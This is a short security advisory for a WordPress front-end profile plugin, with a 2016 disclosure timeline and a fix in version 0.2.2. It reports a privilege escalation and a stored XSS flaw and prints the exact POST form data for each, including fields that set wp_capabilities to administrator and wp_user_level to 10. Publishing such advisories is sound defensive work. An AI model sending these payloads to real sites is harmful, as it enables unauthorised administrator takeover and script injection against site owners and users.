It is possible to modify a POST request to overwrite user meta including ‘wp_capabilities’ and ‘wp_user_level’ which results in a privilege escalation vulnerability. User input is not sanitised or escaped on output resulting in a stored XSS vulnerability. Timeline: 2016-09-12: Vulnerability found 2016-09-12: Reported to vendor 2016-09-12: Vendor responded 2016-09-14: Vendor released a fixed version (0.2.2) 2016-09-14: Public disclosure
Privilege Escalation - Form data profile[user_email]:[email protected] profile[wp_capabilities][administrator]:1 profile[wp_user_level]:10 profile[user_url]: profile[description]: profile[wpfep_save]:Update Profile wpfep_nonce_name:99fc626e77 _wp_http_referer:/sample-page/ Stored XSS - Form data wpmark_tab[testing_field]:example"> wpmark_tab[wpfep_save]:Update Testing wpfep_nonce_name:02c01469d8 _wp_http_referer:/sample-page/